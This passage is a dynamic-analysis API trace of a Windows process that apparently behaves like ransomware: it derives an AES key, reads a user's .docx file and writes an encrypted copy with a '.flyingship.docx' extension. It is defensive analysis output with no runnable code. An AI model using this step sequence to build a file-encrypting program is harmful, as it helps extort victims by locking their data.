(in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.749] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.750] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.750] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.750] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.750] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.750] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.750] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0171.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.750] CryptDestroyHash (hHash=0x90af58) returned 1 [0171.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.751] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.751] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.751] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.751] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ds7b8_ jws.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.752] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.752] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0171.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0171.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0171.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0171.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0171.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0171.755] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0171.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0171.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ds7b8_ jws.flyingship.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0171.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.758] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0171.758] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0171.758] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0171.758] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0171.759] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0171.759] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x4587, lpOverlapped=0x0) returned 1 [0171.762] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0171.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4587) returned 0x900460 [0171.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0171.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4587) returned 0x9e5190 [0171.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900460 | out: hHeap=0x8a0000) returned 1 [0171.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.763] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4587) returned 0x900460 [0171.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900460 | out: hHeap=0x8a0000) returned 1 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.764] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0171.764] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.765] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0171.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0171.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0171.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4587) returned 0x900460 [0171.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0171.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4587) returned 0x9e9720 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, 